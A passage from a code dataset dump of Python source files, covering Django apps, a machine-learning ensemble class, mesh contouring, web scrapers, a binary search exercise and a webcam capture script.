I will be working to make this portion\n # format to a csv file.\n # CSV formatting\n finalFile.write(\", \")\n # We then take the third item in the list which is either a \"*\" or a \"REFERENCE\" depending on\n # whether it was mapped or unmapped.\n finalFile.write(lineList[2])\n else:\n continue\n # Formatting\n finalFile.write(\"\\n\")\n#Closes the open files\nf.close()\nfinalFile.close()\n","sub_path":"unmapped/fileTranslator.py","file_name":"fileTranslator.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"457281454","text":"from abc import ABC, abstractmethod\nfrom concurrent.futures.process import ProcessPoolExecutor\nfrom typing import Sequence, List\nfrom inspect import currentframe, getframeinfo\n\nimport pandas as pd\n\nfrom ..vector_model import VectorModel\nfrom ..util.multiprocessing import VectorModelWithSeparateFeatureGeneration\nfrom ..util.pickle import PickleFailureDebugger\n\n\nclass EnsembleVectorModel(VectorModel, ABC):\n def __init__(self, models: Sequence[VectorModel], numProcesses=1):\n \"\"\"\n :param models:\n :param numProcesses:\n \"\"\"\n self.numProcesses = numProcesses\n self.models = list(models)\n super().__init__(checkInputColumns=False)\n\n def _fit(self, X: pd.DataFrame, Y: pd.DataFrame):\n if self.numProcesses == 1 or len(self.models) == 1:\n for model in self.models:\n model.fit(X, Y)\n return\n\n fittedModelFutures = []\n executor = ProcessPoolExecutor(max_workers=self.numProcesses)\n fitters = [VectorModelWithSeparateFeatureGeneration(model) for model in self.models]\n for fitter in fitters:\n intermediateStep = fitter.fitStart(X, Y)\n frameinfo = getframeinfo(currentframe())\n PickleFailureDebugger.logFailureIfEnabled(intermediateStep,\n contextInfo=f\"Submitting {fitter} in {frameinfo.filename}:{frameinfo.lineno}\")\n fittedModelFutures.append(executor.submit(intermediateStep.execute))\n for i, fittedModelFuture in enumerate(fittedModelFutures):\n self.models[i] = fitters[i].fitEnd(fittedModelFuture.result())\n\n def computeAllPredictions(self, X: pd.DataFrame):\n if self.numProcesses == 1 or len(self.models) == 1:\n return [model.predict(X) for model in self.models]\n\n predictionFutures = []\n executor = ProcessPoolExecutor(max_workers=self.numProcesses)\n predictors = [VectorModelWithSeparateFeatureGeneration(model) for model in self.models]\n for predictor in predictors:\n predictFinaliser = predictor.predictStart(X)\n frameinfo = getframeinfo(currentframe())\n PickleFailureDebugger.logFailureIfEnabled(predictFinaliser,\n contextInfo=f\"Submitting {predictFinaliser} in {frameinfo.filename}:{frameinfo.lineno}\")\n predictionFutures.append(executor.submit(predictFinaliser.execute))\n return [predictionFuture.result() for predictionFuture in predictionFutures]\n\n def _predict(self, x):\n predictionsDataFrames = self.computeAllPredictions(x)\n return self.aggregatePredictions(predictionsDataFrames)\n\n @abstractmethod\n def aggregatePredictions(self, predictionsDataFrames: List[pd.DataFrame]) -> pd.DataFrame:\n pass\n\n\nclass EnsembleRegressionVectorModel(EnsembleVectorModel, ABC):\n def isRegressionModel(self):\n return True\n\n\nclass EnsembleClassificationVectorModel(EnsembleVectorModel, ABC):\n def isRegressionModel(self):\n return 
False\n","sub_path":"src/sensai/ensemble/ensemble_base.py","file_name":"ensemble_base.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"267398812","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom .views import index\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$',index,name='index'),\n url(r'^auth/',include('userauth.urls',namespace=\"auth\")),\n url(r'^dashboard/',include('dashboard.urls',namespace=\"dashboard\")),\n url(r'^hosts/',include('hosts.urls',namespace=\"hosts\")),\n url(r'^assets/',include('assets.urls',namespace=\"assets\")),\n url(r'^monitor/',include('monitor.urls',namespace=\"monitor\")),\n \n]\n","sub_path":"django/projects/django/myweb/myweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370517763","text":"import sys\n\nimport matplotlib.pyplot as plt\n\ntry:\n from csc_486b_assignments.solution.assignment1 import utils\nexcept ModuleNotFoundError:\n import utils\n\n\nif __name__ == \"__main__\":\n k1 = int(sys.argv[1])\n k2 = int(sys.argv[2])\n\n img_inv = utils.read_image_from_h5(\"output.h5\")\n res = utils.find_difference_of_gaussian_blur(img_inv, k1, k2)\n\n plt.figure()\n plt.imshow(res, cmap=\"gray\")\n plt.show()\n\n utils.save_image_to_h5(res, \"filtered.h5\")\n","sub_path":"csc486b/a1/submission-package/solution_3_3.py","file_name":"solution_3_3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"311409486","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n\n# Create your views here.\ndef player_scraping_view(request):\n player = request.GET.get('player') or \"Joe Flacco\"\n url = \"http://www.nfl.com/search?query={}\".format(player)\n content = requests.get(url).text\n souper = BeautifulSoup(content, \"html.parser\")\n data_table = souper.find(class_=\"stats\").attrs[\"href\"]\n content = requests.get(data_table).text\n souper = BeautifulSoup(content, \"html.parser\")\n player_stats = str(souper.find(id=\"main-content\"))\n return render(request,\"index.html\",{\"data_table\": data_table, \"player_stats\": player_stats})\n\n#def player_scraping_view(request):\n #player = request.GET.get('player') or \"Drew Brees\"\n #current_player = get_stats(player)\n #player_id = urlparse(current_player.attrs(\"href\")).query.strip(\"id\")\n #content = requests.get('http://www.nfl.com/player/drewbrees/2504775/profile')\n #souper = BeautifulSoup(content.text, \"html.parser\")\n #return render(request,\"index.html\",{\"current_player\": current_player,\"player\": player})\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"511870921","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom core.models import (CourseDetailHighlight, CourseInformationMapping,\n CourseSpotlight, Experience, InterestList,\n SavedFilter, SearchFilter, SearchSortOption,\n XDSConfiguration, XDSUIConfiguration, XDSUser)\n\n\n# Register your models here.\n@admin.register(XDSConfiguration)\nclass XDSConfigurationAdmin(admin.ModelAdmin):\n list_display = 
('target_xis_metadata_api', 'created', 'modified',)\n fields = [('target_xis_metadata_api',)]\n\n\n@admin.register(XDSUIConfiguration)\nclass XDSUIConfigurationAdmin(admin.ModelAdmin):\n list_display = ('search_results_per_page', 'xds_configuration',\n 'created', 'modified',)\n fields = [('search_results_per_page', 'xds_configuration',\n 'course_img_fallback')]\n\n\n@admin.register(SearchFilter)\nclass SearchFilterAdmin(admin.ModelAdmin):\n list_display = ('display_name', 'field_name', 'xds_ui_configuration',\n 'filter_type', 'active', 'created', 'modified',)\n fields = [('display_name', 'field_name', 'xds_ui_configuration',\n 'filter_type', 'active',)]\n\n\n@admin.register(SearchSortOption)\nclass SearchSortOptionAdmin(admin.ModelAdmin):\n list_display = ('display_name', 'field_name', 'xds_ui_configuration',\n 'active', 'created', 'modified',)\n fields = [('display_name', 'field_name', 'xds_ui_configuration',\n 'active',)]\n\n\n@admin.register(CourseDetailHighlight)\nclass CourseDetailHighlightAdmin(admin.ModelAdmin):\n list_display = ('display_name', 'field_name', 'xds_ui_configuration',\n 'active', 'highlight_icon', 'rank', 'created', 'modified',)\n fields = [('display_name', 'field_name', 'xds_ui_configuration',\n 'active', 'highlight_icon', 'rank',)]\n\n\n@admin.register(CourseSpotlight)\nclass CourseSpotlightAdmin(admin.ModelAdmin):\n list_display = ('course_id', 'active',)\n\n\n@admin.register(CourseInformationMapping)\nclass CourseInformationMappingAdmin(admin.ModelAdmin):\n list_display = ('course_title', 'course_description',\n 'course_url', 'xds_ui_configuration')\n\n fields = ['course_title', 'course_description',\n 'course_url', 'xds_ui_configuration']\n\n\nclass XDSUserAdmin(UserAdmin):\n model = XDSUser\n search_fields = ('email', 'first_name',)\n list_filter = ('is_active', 'is_staff', 'is_superuser')\n ordering = ('-date_joined', '-last_login')\n list_display = ('email', 'first_name',\n 'is_active', 'is_staff', 'last_login')\n fieldsets = (\n (None, {'fields': ('email', 'first_name', 'last_name',)}),\n ('Permissions', {'fields': ('is_staff', 'is_active',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('email', 'first_name', 'last_name',\n 'password1', 'password2', 'is_active', 'is_staff')}\n ),\n )\n\n\nadmin.site.register(XDSUser, XDSUserAdmin)\n\n\n@admin.register(Experience)\nclass ExperienceAdmin(admin.ModelAdmin):\n list_display = ('metadata_key_hash',)\n\n\n@admin.register(InterestList)\nclass InterestListAdmin(admin.ModelAdmin):\n list_display = ('owner', 'name', 'created', 'modified',)\n fields = ['owner', 'name', 'description', 'experiences']\n\n\n@admin.register(SavedFilter)\nclass SavedFilterAdmin(admin.ModelAdmin):\n list_display = ('owner', 'name', 'query', 'modified',)\n fields = ['owner', 'name', 'query']\n","sub_path":"app/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"423201265","text":"from django.urls import path\nfrom .views import *\n\napp_name = 'products'\n\nurlpatterns = [\n path('', HomeView.as_view(), name='home'),\n path(r'products///', ProductDetailView.as_view(), name='product_detail'),\n path(r'products//', CategoryDetailView.as_view(), name='category_detail'),\n path(r'search/', SearchView.as_view(), 
name='search')\n]\n","sub_path":"Lab3/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"50044963","text":"\n\nfrom xai.brain.wordbase.adjectives._prepay import _PREPAY\n\n#class header\nclass _PREPAYS(_PREPAY, ):\n\tdef __init__(self,): \n\t\t_PREPAY.__init__(self)\n\t\tself.name = \"PREPAYS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"prepay\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_prepays.py","file_name":"_prepays.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"369477934","text":"import numpy as np\nimport visu\nfrom collections import deque\nimport geometry as geo\nfrom classes import Node, Element\n\n\ndef add_contour_polygon(elmt, all_nodes, ct_low, ct_high):\n    vectors = [all_nodes[nid].coords for nid in elmt.node_ids]\n    vectors.append(vectors[0])\n\n    ct_poly = []\n\n    for v_1, v_2 in zip(vectors[:3], vectors[1:]):\n        v_low, v_high = None, None\n\n        if v_1[0] == v_2[0] and v_1[1] == v_2[1] and v_1[2] == v_2[2]:\n            a = 1\n\n        method = 0\n        # 1) Edge not inside class.\n        if min(v_1[2], v_2[2]) > ct_high or max(v_1[2], v_2[2]) < ct_low:\n            continue\n\n        # 2) Contour edge is on triangle edge. TODO: Solve that problem\n        #elif v_1[2] == v_2[2]:\n        #    method = 2\n        #    v_high = v_1\n        #    v_low = v_2\n\n        # 3) Edge completely inside class. Two new vertices will be created\n        elif min(v_1[2], v_2[2]) < ct_low and max(v_1[2], v_2[2]) > ct_high:\n            method = 3\n            ratio_low = (ct_low - v_1[2]) / (v_2[2] - v_1[2])\n            ratio_high = (ct_high - v_1[2]) / (v_2[2] - v_1[2])\n            v_low = v_1 + ratio_low * (v_2 - v_1)\n            v_high = v_1 + ratio_high * (v_2 - v_1)\n\n        # 4) Edge surrounds class. Two vertices will be chosen\n        elif min(v_1[2], v_2[2]) > ct_low and max(v_1[2], v_2[2]) < ct_high:\n            method = 4\n            #v_low = v_1 if v_1[2] < v_2[2] else v_2\n            #v_high = v_2 if v_2[2] > v_1[2] else v_1\n            v_low, v_high = v_1, v_2\n\n        # 5) Lower vertex inside class. One new vertex will be created, the other will be chosen.\n        elif min(v_1[2], v_2[2]) >= ct_low:\n            method = 5\n            ratio_high = (ct_high - v_1[2]) / (v_2[2] - v_1[2])\n            v_low = v_1 if v_1[2] < v_2[2] else v_2\n            v_high = v_1 + ratio_high * (v_2 - v_1)\n\n        # 6) Higher vertex inside class. 
One new vertex will be created, the other will be chosen.\n elif max(v_1[2], v_2[2]) <= ct_high:\n method = 6\n ratio_low = (ct_low - v_1[2]) / (v_2[2] - v_1[2])\n v_low = v_1 + ratio_low * (v_2 - v_1)\n v_high = v_1 if v_1[2] > v_2[2] else v_2\n\n # Should not happen\n else:\n print(\"UNEXPECTED ERROR: THIS LINE OF CODE SHOULD NEVER BE REACHED (ERR01).\")\n\n # Adding points to new contour polygon\n if geo.dist(v_1, v_low) < geo.dist(v_1, v_high):\n ct_poly.append(v_low)\n ct_poly.append(v_high)\n else:\n ct_poly.append(v_high)\n ct_poly.append(v_low)\n\n if min(v_low[0], v_high[0]) < 0 or min(v_low[1], v_high[1]) < 0 :\n a = 1\n\n\n if len(ct_poly) > 0:\n # Check for follwing dublicates\n ct_poly_checked = [ct_poly[0]]\n for v in ct_poly[1:]:\n last = ct_poly_checked[-1]\n if geo.dist(v, last) > 0.00001:\n ct_poly_checked.append(v)\n if geo.dist(ct_poly_checked[0], ct_poly_checked[-1]) < 0.0001:\n ct_poly_checked = ct_poly_checked[:-1]\n\n #ct_poly.append(ct_poly[0])\n elmt.contour_polygons[ct_low] = np.array(ct_poly_checked)\n\n\ndef create_contour_polygons_for_each_element(elements, all_nodes, ct_values):\n for elmt in elements: # TODO: Embarrassingly Parallel -> implement\n for i in range(len(ct_values) - 1):\n add_contour_polygon(elmt, all_nodes, ct_low=ct_values[i], ct_high=ct_values[i + 1])\n\n\ndef merge_polygons_old(poly_a, poly_b):\n poly_a_id_1 = id(poly_a)\n\n rot_cnt_a = 0\n rot_cnt_b = 0\n match_found = False\n for i, a in enumerate(poly_a):\n for j, b in enumerate(poly_b):\n if geo.dist(a, b) < 0.001:\n rot_cnt_a = len(poly_a) - i - 1\n rot_cnt_b = len(poly_b) - j\n match_found = True\n break\n if match_found:\n break\n deq_a = deque(poly_a)\n deq_b = deque(poly_b)\n deq_a.rotate(rot_cnt_a)\n deq_b.rotate(rot_cnt_b)\n poly_a = list(deq_a)\n poly_b = list(deq_b)\n\n poly_a_id_2 = id(poly_a)\n #merged_polygon = poly_a + poly_b[1:-1] # TODO: Make it work when more than two same vertices\n merged_polygon = poly_a + poly_b\n\n # IMPORTANT CHECK BECAUSE OF ERRORS\n dubl_count = 0\n merged_polygon_new = [merged_polygon[0]]\n for i in range(1, len(merged_polygon)):\n if geo.dist(merged_polygon[i], merged_polygon_new[-1]) < 0.001:\n dubl_count += 1\n else:\n merged_polygon_new.append(merged_polygon[i])\n\n if geo.dist(merged_polygon_new[0], merged_polygon_new[-1]) < 0.001:\n merged_polygon_new = merged_polygon_new[:-1]\n dubl_count += 1\n\n if dubl_count > 0:\n a = 1\n merged_polygon = merged_polygon_new\n # CHECK ENDS HERE\n\n merged_polygon = np.array(merged_polygon)\n\n if merged_polygon is None:\n a = 1\n\n return merged_polygon\n\n\ndef merge_polygons_oldv2(poly_a, poly_b):\n plot = False\n if plot:\n visu.plot_polys(poly_a, poly_b)\n\n epsilon = 0.001\n\n dublicate_indices_a = []\n dublicate_indices_b = []\n dublicate_counter = 0\n for i, a in enumerate(poly_a):\n for j, b in enumerate(poly_b):\n if geo.dist(a, b) < epsilon:\n dublicate_counter += 1\n dublicate_indices_a.append(i)\n dublicate_indices_b.append(j)\n zero_ones_a = [False] * len(poly_a)\n zero_ones_b = [False] * len(poly_b)\n\n for i in dublicate_indices_a:\n zero_ones_a[i] = True\n for j in dublicate_indices_b:\n zero_ones_b[j] = True\n\n def get_rot_cnt(zero_ones, dubl_counter):\n if zero_ones[0] is True:\n true_cnt = 0\n for boolean in zero_ones:\n if boolean is True:\n true_cnt += 1\n elif boolean is False:\n return dubl_counter - true_cnt\n return 0\n elif zero_ones[0] is False:\n false_cnt = 0\n for boolean in zero_ones:\n if boolean is False:\n false_cnt += 1\n elif boolean is True:\n return len(zero_ones) 
- false_cnt\n\n rot_cnt_a = get_rot_cnt(zero_ones_a, dublicate_counter)\n rot_cnt_b = get_rot_cnt(zero_ones_b, dublicate_counter)\n\n deq_a = deque(poly_a)\n deq_b = deque(poly_b)\n\n deq_a.rotate(rot_cnt_a - 1) # minus one to delete the first entries later\n deq_b.rotate(rot_cnt_b)\n\n if dublicate_counter == len(poly_b):\n if dublicate_counter == 4:\n poly_a_list = list(poly_a)\n part1 = poly_a_list[dublicate_indices_a[0]:dublicate_indices_a[1]]\n part2 = [poly_a_list[dublicate_indices_a[3]], poly_a_list[dublicate_indices_a[2]]]\n part3 = poly_a_list[dublicate_indices_a[1]:]\n merged_polygon = part1 + part2 + part3\n return np.array(merged_polygon)\n else:\n return poly_a\n a = 1\n\n poly_a_rot = list(deq_a)[dublicate_counter-2:]\n poly_b_rot = list(deq_b)[dublicate_counter:]\n\n merged_polygon = np.array(poly_b_rot + poly_a_rot )\n\n return merged_polygon\n\n\ndef merge_polygons(poly_a, poly_b, nodes, elements, ct_val):\n plot = True\n if plot:\n visu.plot_contours_final(nodes, elements, {ct_val: [poly_a, poly_b]}, [ct_val])\n\n epsilon = 0.001\n\n dublicate_indices_a = []\n dublicate_indices_b = []\n dublicate_count = 0\n for i, a in enumerate(poly_a):\n for j, b in enumerate(poly_b):\n if geo.dist(a, b) < epsilon:\n dublicate_count += 1\n dublicate_indices_a.append(i)\n dublicate_indices_b.append(j)\n zero_ones_a = [False] * len(poly_a)\n zero_ones_b = [False] * len(poly_b)\n\n if dublicate_count == 0: # TODO: WHY??????\n return None\n elif len(dublicate_indices_b) == len(poly_b):\n return poly_a\n\n for i in dublicate_indices_a:\n zero_ones_a[i] = True\n for j in dublicate_indices_b:\n zero_ones_b[j] = True\n\n def get_rot_cnt(zero_ones, dubl_count):\n prev_bool = zero_ones[0]\n counter = 0\n for this_boolean in zero_ones[1:]:\n if prev_bool is True and this_boolean is False: # switch from true to false\n return -1 * counter\n prev_bool = this_boolean\n counter += 1\n return -1 * counter\n #counter = 0\n #for i, boolean in enumerate(zero_ones):\n # if boolean == True:\n # counter += 1\n # if counter == dubl_count:\n # return -1 * i\n\n rot_cnt_a = get_rot_cnt(zero_ones_a, dublicate_count)\n rot_cnt_b = get_rot_cnt(zero_ones_b, dublicate_count)\n\n deq_a = deque(poly_a)\n deq_b = deque(poly_b)\n\n deq_a.rotate(rot_cnt_a)\n deq_b.rotate(rot_cnt_b)\n\n poly_a_list = list(deq_a)\n poly_b_list = list(deq_b)\n\n if len(poly_b) == dublicate_count:\n merged_polygon = poly_a_list[:-(dublicate_count-2)]\n else:\n merged_polygon = poly_a_list[:-(dublicate_count-1)] + poly_b_list[:-(dublicate_count-1)]\n\n return np.array(merged_polygon)\n\n\ndef recursive_merging(elements, elmt, ct_val, merged_poly, nodes):\n plot = True\n neigh_elements = [elements[eid] for eid in elmt.neigh_elmt_ids\n if not elements[eid].merged]\n for nelmt in neigh_elements:\n if ct_val in nelmt.contour_polygons:\n if nelmt.merged:\n continue\n\n before_merged_poly = np.copy(merged_poly)\n merged_poly = merge_polygons(merged_poly, nelmt.contour_polygons[ct_val],\n nodes, elements, ct_val)\n if merged_poly is None: # can happend indeed\n return before_merged_poly\n nelmt.merged = True\n merged_poly = recursive_merging(elements, nelmt, ct_val, merged_poly, nodes)\n a = 1\n #if elmt.id == 8 and nelmt.id == 7:\n # return merged_poly\n #return merged_poly # TODO: correct?\n #else:\n # return merged_poly # TODO: Problem. 
Preemptive sending back\n    return merged_poly\n\n\n# merging all ccw polygons\ndef merge_contour_polygons(elements, ct_values, nodes):\n    ct_poly_dict = {}\n\n    for ct_val in ct_values[:-1]:\n        ct_poly_dict[ct_val] = []\n\n        for elmt in elements:\n            if elmt.merged:\n                continue # TODO: Is that correct?\n\n            merged_poly = []\n            if ct_val in elmt.contour_polygons:\n                merged_poly = elmt.contour_polygons[ct_val]\n                elmt.merged = True\n                merged_poly = recursive_merging(elements, elmt, ct_val, merged_poly, nodes)\n                if merged_poly is not None:\n                    ct_poly_dict[ct_val].append(merged_poly)\n                a = 1\n            else:\n                a = 1\n\n    for elmt in elements:\n        elmt.merged = False\n    return ct_poly_dict\n","sub_path":"contouring.py","file_name":"contouring.py","file_ext":"py","file_size_in_byte":10953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"206835818","text":"\"\"\"File main.urls.py defining the URLs.\"\"\"\nfrom django.conf.urls.static import static\nfrom django.conf import settings as main_settings\nfrom django.urls import path\nfrom .views import *\n\n\nurlpatterns = [\n    path(\"\", index, name='index'),\n    path('drone/', index, name='index1'),\n    path('news/', detailed_article, name='detailed_article'),\n    path('vols', vols, name='vols'),\n    path('vols/', detailed_vol, name='detailed_vols'),\n    path('confs', configurations, name='confs'),\n    path('confs/', detailed_configuration, name='detailed_confs'),\n    path('comps', composants, name='comps'),\n    path('comps/', detailed_composant, name='detailed_comps'),\n] + static(main_settings.MEDIA_URL, document_root=main_settings.MEDIA_ROOT)\n","sub_path":"multisite/drone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"2728462","text":"from django import forms\r\n\r\nCATEGORIES = (\r\n    (20081, 'Antiques'),\r\n    (550, 'Art'),\r\n    (2984, 'Baby'),\r\n    (267, 'Books, Comics & Magazines'),\r\n    (12576, 'Business, Office & Industrial'),\r\n    (625, 'Cameras & Photography'),\r\n    (9800, 'Cars, Motorcycles & Vehicles'),\r\n    (11450, 'Clothes, Shoes & Accessories'),\r\n    (11116, 'Coins'),\r\n    (1, 'Collectables'),\r\n    (58058, 'Computers/Tablets & Networking'),\r\n    (14339, 'Crafts'),\r\n    (237, 'Dolls & Bears'),\r\n    (11232, 'DVDs, Films & TV'),\r\n    (1305, 'Events Tickets'),\r\n    (159912, 'Garden & Patio'),\r\n    (26395, 'Health & Beauty'),\r\n    (3252, 'Holidays & Travel'),\r\n    (11700, 'Home, Furniture & DIY'),\r\n    (281, 'Jewellery & Watches'),\r\n    (15032, 'Mobile Phones & Communication'),\r\n    (11233, 'Music'),\r\n    (619, 'Musical Instruments'),\r\n    (1281, 'Pet Supplies'),\r\n    (870, 'Pottery, Porcelain & Glass'),\r\n    (10542, 'Property'),\r\n    (293, 'Sound & Vision'),\r\n    (888, 'Sporting Goods'),\r\n    (64482, 'Sports Memorabilia'),\r\n    (260, 'Stamps'),\r\n    (220, 'Toys & Games'),\r\n    (131090, 'Vehicle Parts & Accessories'),\r\n    (1249, 'Video Games & Consoles'),\r\n    (40005, 'Wholesale & Job Lots'),\r\n    (99, 'Everything Else'),\r\n)\r\n\r\nclass SearchForm(forms.Form):\r\n    categoryID = forms.ChoiceField(label=\"Category\", choices=CATEGORIES)\r\n    query = forms.CharField(label=\"Search\", max_length=50)","sub_path":"search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"587692503","text":"#!/usr/bin/python\nimport music21\nimport settings\nsBach = music21.corpus.parse('bach/bwv7.7')\nmf = 
music21.midi.translate.streamToMidiFile(sBach.parts[0])\nfilename = 'testBach'\nmf.open(settings.getMidiName(filename), 'wb')\nmf.write()\nmf.close()\n\n\n\n\n","sub_path":"srcbk/corp2midi.py","file_name":"corp2midi.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"618587777","text":"# coding: utf-8\r\n\r\n\r\n\r\n''' find is the function that locates the number you are searching for in the list by halving the interval closer and closer\r\n    to the sought number until it finds it. '''\r\ndef find(numbers, n): \r\n    position = -1 # This lets the program know if the number was not found in the list\r\n    higher = len(numbers) - 1\r\n    lower = 0\r\n    middle = 0 \r\n    \r\n    while higher >= lower: \r\n        middle = (higher + lower) // 2\r\n        if numbers[middle] == n: # Checks whether the number lies exactly between higher and lower; if so, its position has been found\r\n            position = middle + 1\r\n            return position\r\n        elif numbers[middle] < n: # Checks whether the number is greater than the midpoint\r\n            lower = middle + 1\r\n        elif numbers[middle] > n: # Checks whether the number is smaller than the midpoint \r\n            higher = middle - 1\r\n    \r\n    return position\r\n\r\n\r\n\r\n''' This function generates a random list, taking how many elements it should contain and how large the spread of the numbers\r\n    should be, by checking which number is given in numberSpan. '''\r\ndef generateList(element, numberSpan):\r\n    import random\r\n    numbers = []\r\n    \r\n    for z in range(0,element):\r\n        randomNumber = random.randint(0,numberSpan)\r\n        numbers.append(randomNumber)\r\n    \r\n    numbers.sort() # Sorts the list so that the binary search can find the number.\r\n    return numbers\r\n\r\n\r\n\r\n''' This function makes the program interactive and user-friendly by asking the user which integer they want to search for,\r\n    how many different integers they want in their list, and how large the random numbers may become. '''\r\ndef interactiv():\r\n    print('-'*50)\r\n    validInput = False\r\n    errorText = 'Oops! That was not an integer, try again..'\r\n    \r\n    # This while loop keeps looping until it reaches a break, which can only happen once it gets a valid integer.\r\n    while not validInput:\r\n        try:\r\n            n = int(input('Enter the integer you want to find: '))\r\n            break\r\n        except ValueError:\r\n            print(errorText) \r\n    print('-'*50)\r\n    while not validInput:\r\n        try:\r\n            element = int(input('Enter how many integers you want to generate: '))\r\n            break\r\n        except ValueError:\r\n            print(errorText) \r\n    print('-'*50)\r\n    while not validInput:\r\n        try:\r\n            numberSpan = int(input('Enter how large the generated integers may be: '))\r\n            break\r\n        except ValueError:\r\n            print(errorText) \r\n    runTestCode(n, element, numberSpan) \r\n    \r\n\r\n\r\n''' This function is test code that checks that the program works, plus code to make it more user-friendly\r\n    and easier to understand what happened and whether the number the user searched for was in the list. '''\r\ndef runTestCode(n, element, numberSpan):\r\n    print('-'*50)\r\n    numbers = generateList(element, numberSpan)\r\n    print(\"Your list: \",numbers)\r\n    print(\"The sought number :\",n)\r\n    position = find(numbers, n)\r\n    \r\n    if (position >= 0):\r\n        print(n, \"is at position\", position)\r\n    else:\r\n        print(n, \"is not in the list\")\r\n\r\n\r\n\r\n''' runTestCode(n, element, numberSpan) where n is the number you want to find, element is the number of elements, \r\n    and numberSpan is the spread of the numbers. '''\r\nrunTestCode(1, 20, 100)\r\nrunTestCode(9, 19, 99)\r\nrunTestCode(42, 14, 72)\r\ninteractiv()\r\n\r\n''' Question: How many comparisons are required for binary search on a list of 1000 elements? \r\n    Answer: Binary search needs 9 comparisons '''","sub_path":"BinSearch.py","file_name":"BinSearch.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"353957492","text":"import win32print\nimport win32ui\nfrom PIL import Image, ImageWin\nimport cv2\nimport numpy as np\nimport time\n\nglobal pic_countdown\npic_countdown = -1\ndef foo(event,x,y,flags,param):\n    if event == cv2.EVENT_LBUTTONDOWN:\n        global pic_countdown\n        if pic_countdown == -1:\n            pic_countdown = 10\n\n\n\nwindow_name = 'frame'\nfile_names = [\"filename_0.png\", \"filename_1.png\",\"filename_2.png\",\"filename_3.png\"]\ncam = cv2.VideoCapture(0)\nframe = np.zeros((512,512,3), np.uint8)\ncapture_index = 0\n\nfontface = cv2.FONT_HERSHEY_SIMPLEX\nfontscale = 1\nfontcolor = (255, 255, 255)\n\n\ncv2.namedWindow(window_name)\ncv2.imshow(window_name, frame)\ncv2.setMouseCallback(window_name, foo)\n\nwhile(True) :\n    # Capture frame-by-frame\n    ret, frame = cam.read()\n    frame = cv2.flip(frame, 1)\n\n    # Display the resulting frame\n    if(0 < pic_countdown) :\n        cv2.putText(frame,\"Ready?\" + str(pic_countdown), (100, 100), fontface, fontscale, fontcolor)\n        pic_countdown = pic_countdown - 1\n    elif(pic_countdown == 0):\n        frame = cv2.flip(frame, 1)\n        file_name = str(time.time()) + \".png\"\n        cv2.imwrite(file_name, frame)\n        pic_countdown = pic_countdown - 1\n    else :\n        cv2.putText(frame,\"Sleep\" + str(pic_countdown), (100,100), fontface, fontscale, fontcolor)\n\n    cv2.imshow(window_name, frame)\n    if cv2.waitKey(14) & 0xFF == ord('q'):\n        break\n#\n# cv2.destroyAllWindows()\n# while(True):\n#     ret, frame = cam.read()\n#     if ret==True:\n#         frame = cv2.flip(frame,0)\n#         # write the flipped frame\n#         cv2.imshow(window_name, frame)\n#         cv2.setMouseCallback(window_name, foo)\n#     else:\n#         print('read failed')\n#\n# cv2.namedWindow(window_name)\n# cv2.setMouseCallback(window_name, foo)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"431776389","text":"import requests\nimport bs4\nfrom datetime import datetime\n\nurl = 'https://habr.com/ru/all/'\npage = requests.get(url).text\nlike_hubs = {'JavaScript', 'Python'}\nsoup = bs4.BeautifulSoup(page, features='html.parser')\n\narticles = soup.find_all(class_=\"tm-articles-list__item\")\nfor article in articles:\n    title = article.find(class_=\"tm-article-snippet__title tm-article-snippet__title_h2\").text\n    href = url + article.find(class_=\"tm-article-snippet__title-link\").attrs['href']\n    hubs = article.find_all(class_=\"tm-article-snippet__hubs-item-link\")\n    hubs = {hub.find('span').text for hub in hubs}\n    data_str = article.find(class_=\"tm-article-snippet__datetime-published\").find(\"time\").attrs['datetime']\n    data = datetime.strptime(data_str, '%Y-%m-%dT%H:%M:%S.%fZ').date()\n    if like_hubs & hubs:\n        print(f'Publication date: {data},\nArticle title - \"{title}\", link - 